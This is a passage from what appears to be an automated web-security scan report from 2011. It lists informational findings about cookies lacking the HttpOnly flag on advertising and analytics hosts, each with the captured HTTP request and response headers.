A30AM&c42=Thursday&v42=Thursday&c45=Referrers&v45=D%3Dc45&c46=n/a&v46=D%3Dc46&c47=dealbook.nytimes.com&v47=D%3Dc47&v48=dealbook.nytimes.com&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1046&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Wed, 11 May 2011 11:38:45 GMT
Last-Modified: Fri, 13 May 2011 11:38:45 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www35
Content-Length: 0
Content-Type: text/plain


14.96. http://odb.outbrain.com/utils/get

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /utils/get?url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&settings=true&recs=true&widgetJSId=AR_1&key=AYQHSUWJ8576&idx=0&version=37740&ref=http%3A%2F%2Fdealbook.nytimes.com%2F2011%2F05%2F03%2Fforstmann-is-said-to-be-undergoing-treatment-for-brain-cancer%2F&apv=false&rand=0.3115259031765163&sig=poBUI2TM HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJupcdCqR9LRjXrHG0R5k0w1Cmy75SN8RJIxU/gzm6hl65Q=="; _lvd2="27vfag1ZPzfDGaK+UsDEF0v9S/ktpBpl0hVg0CrIJzZ7WZ/pwAclWtc9oa67TDjH3K7ooLp1QJFKcF+HzHyRcQ=="; _rcc2="c5YqA63GvjSl+Ov6ordflA=="; obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Sun, 06-May-2012 11:38:58 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1305200338968; Domain=.outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJupcdCqR9LRjXrHG0R5k0w1Cmy75SN8RJIzfjUZTvndAnxUfc7q0DyhK"; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Thu, 07-Jun-2012 11:38:58 GMT; Path=/
Set-Cookie: _lvd2="27vfag1ZPzfDGaK+UsDEF0v9S/ktpBpl0hVg0CrIJzZ7WZ/pwAclWtc9oa67TDjH3K7ooLp1QJFbCCininxsHoqtNnPoy33i"; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Thu, 19-May-2011 00:26:58 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Thu, 07-Jun-2012 11:38:58 GMT; Path=/
Set-Cookie: recs-e80144bf1a192df3448809d952ee1141="eC1Ki6F3rC8/svSOgW/oVTpcaosScNndNmo3MfZ/qv3YEjyvRDq1LX6X1QyPUzCq6iss2g1lePRnvUVzvXh96eFC8InIUHABF8oRDv48Y9bI07wQyS0dxtSyPDvDcjnrDOayEsL6HLp5WOXcO9UcZQ=="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Thu, 12-May-2011 11:43:58 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:38:58 GMT
Content-Length: 9669

outbrain_rater.returnedOdbData({'response':{'exec_time':22,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'203171120','req_id':'6b5cb9196177dce1b62f4444a3713fd2'},'score':{'preferred
...[SNIP]...

14.97. http://odb.outbrain.com/utils/ping.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/ping.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ping.html?random=0.8784565008245409 HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJupcdCqR9LRjXrHG0R5k0w1Cmy75SN8RJIxU/gzm6hl65Q=="; _lvd2="27vfag1ZPzfDGaK+UsDEF0v9S/ktpBpl0hVg0CrIJzZ7WZ/pwAclWtc9oa67TDjH3K7ooLp1QJFKcF+HzHyRcQ=="; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Sun, 06-May-2012 11:38:43 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Accept-Ranges: bytes
ETag: W/"158-1304265382000"
Last-Modified: Sun, 01 May 2011 15:56:22 GMT
Content-Type: text/html
Content-Length: 158
Date: Thu, 12 May 2011 11:38:42 GMT

<html>
   <head>
       <META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
       <META HTTP-EQUIV="Pragma" CONTENT="no-cache">
   </head>
   <body>
   </body>
</html>

14.98. http://overseebroad.d.chango.com/c/t.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://overseebroad.d.chango.com
Path:   /c/t.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c/t.js?partnerId=oversee-broad&domainTargeting=true&pageURL=http%3A%2F%2Fpepperhamilton.com%2F%3Fepl%3D7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA&referrerURL=http%3A%2F%2Fpepperhamilton.com%2F&q=find%20lawyers%20in%20your%20area%2CLaw%20firm%2Ccorporate%20law%2Csecurities%20law&t=%20%20pepperhamilton.com%20%20 HTTP/1.1
Host: overseebroad.d.chango.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ox=1; _i_st=1; _i_tm=1; _i_ab=1; _i_sl=1; _i_gid=1; _i_cw=1; _t=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; _i_pm=1

Response

HTTP/1.1 200 OK
Content-Length: 0
Server: Chango RTB Server
Etag: "da39a3ee5e6b4b0d3255bfef95601890afd80709"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Set-Cookie: _t=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; Domain=chango.com; expires=Sun, 09 May 2021 12:01:53 GMT; Path=/
Connection: close


14.99. http://pepperhamilton.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pepperhamilton.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA HTTP/1.1
Host: pepperhamilton.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: parkinglot=1

Response

HTTP/1.0 200 (OK)
Cache-Control: private, no-cache, must-revalidate
Connection: Keep-Alive
Pragma: no-cache
Server: Oversee Turing v1.0.0
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Keep-Alive: timeout=3, max=99
P3P: policyref="http://www.dsnextgen.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
Set-Cookie: ident=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1305201705%7Cclick%3A0%7Cblocked%3A0%7Ctoken%3Ayzustqxtwswvrsr; path=/; expires=Fri, 13-May-2011 12:01:45 GMT
Set-Cookie: pepperhamilton.com=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1305201705%7Cclick%3A0%7Cblocked%3A0; path=/; expires=Fri, 13-May-2011 12:01:45 GMT
Set-Cookie: Spusr=3c0015ac4dd84dcbcc2919f5; path=/; expires=Sat, 11-May-2013 12:01:45 GMT
Content-Length: 51485

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<!-- turing_cluster_prod -->
<html>
<head> <title> pepperhamilton.com </title>
<meta http-equiv="Keywords"
...[SNIP]...

14.100. http://pillsburylaw.app4.hubspot.com/salog.js.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pillsburylaw.app4.hubspot.com
Path:   /salog.js.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /salog.js.aspx HTTP/1.1
Host: pillsburylaw.app4.hubspot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Thu, 12 May 2011 12:21:46 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=StsAonAvzQEkAAAAYjYwNjBlNjMtYTcyMi00NzE0LWI1NjQtNDMyYWNlNmQ3NDBj0; expires=Fri, 11-May-2012 12:21:46 GMT; path=/; HttpOnly
Set-Cookie: hubspotutk=148ff71c-54bf-42a7-b313-024966931ee5; domain=pillsburylaw.app4.hubspot.com; expires=Wed, 12-May-2021 05:00:00 GMT; path=/; HttpOnly
Vary: Accept-Encoding
Set-Cookie: HUBSPOT95=521213100.0.0000; path=/
Content-Length: 498


var hsUse20Servers = true;
var hsDayEndsIn = 56293;
var hsWeekEndsIn = 315493;
var hsMonthEndsIn = 1697893;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-05-12 08:21
...[SNIP]...

14.101. http://pix04.revsci.net/D08734/a1/0/0/0.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEIuMZ7FlTxCZ1EPDlWZ8EFI&cver=1 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; udm_0=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; rsiPus_qbvO="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"; rsi_us_1000000="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"; 

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4jOhOHMMH/CFfyFZ5hBdG2vMqqLhSnJolGYsbyViGzm2jLwzYcdvSuDCX0BRE1faH6+pFVa+GWQXtDZTUlxD+4jxjaUOSiFWtaoRoWoEPzPFS/qMKOOgZxQVZZx2KCmQqCYRlyRJf87ly0DSxTUuHjFQ0X4Hi6hsBM3tptwhcQ6pKtiVzlPmT7J8YSmFCk8nGaEi8uw/pmdbUTDTCxPk3RxS+r7mTK51H+dbGZLb/kqnwYVwKVrKOpzc2O7wkmux+3qQQWO2J/PszzKC3ljESTz9399xzwtiFsZVYcKXVwxqFxDvGNQKXo0ptbR/IoxdSLmJBEm/k8mMZ4WHkJPjZT6fMEbI5g2M23AmaEQVktEetBJDbNPFWQ27V53NSmx+pbUr0pyI2ZBpEkHXsJYi7feTziLd3p9rHEXUDElkF/JDK4BDzYWVkKPFz6yF0rj48gBSTjhqU76TX+wY6WQDAsO771VDP2ZWQ68peAWlQwYgNRKVrDobMsl6Di7agpiSJECqh49MPhXgfUNp5lUgedG8SrI1FwY+H+428kgnXdAmQmN7meRbdFHLSVjzHBTtsWXT5/q0gECh/yWYSya2Cs2TIFbkGCETZtyyfEwg+tWpzb+0IRvhjWHw7U+DaYa4diIYnFw06AxKeXqq5os2iI7jC3Nwf1OV6egaBTwbrJMZV+YVqL6TCiQG/Ma7cvYoHyjMK/GORsYUSnGWb/7Qya7gaNIaWZhJB3LxWvWTaSypA8xdHhg+e92kAdckvfreKjwNhZ3lgBC+XuGOtuJj6dxjPWryrjN2phQuTcOO/r6vGfLN8Z67irPcUn4=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:38:29 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:38:29 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 11:38:29 GMT

GIF89a.............!.......,...........D..;

14.102. http://pix04.revsci.net/E05510/b3/0/3/1003161/38529734.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05510/b3/0/3/1003161/38529734.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05510/b3/0/3/1003161/38529734.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Fmarkets%252F2011%252F05%252F03%252Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%252F%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F2011%252F05%252F03%252Fforstmann-is-said-to-be-undergoing-treatment-for-brain-cancer%252F%26DM_EOM%3D1&C=E05510 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; rtc_6SVK=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; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; rsiPus_hjCW="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"; 
rsi_us_1000000="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"; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_6SVK=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:38:26 GMT; Path=/
Set-Cookie: NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b0b2&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Thu, 09-Jun-2011 11:38:26 GMT; Path=/
Set-Cookie: rtc_Pt3a=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:38:26 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:38:26 GMT
Content-Length: 699

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['E05510_10428'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-
...[SNIP]...

14.103. http://pix04.revsci.net/H07707/b3/0/3/0806180/203086575.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/203086575.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/203086575.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252Fcategory%252Fmain-topics%252Fmergers-acquisitions%252F%26DM_CAT%3DNYTimesglobal%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; udm_0=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; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; 
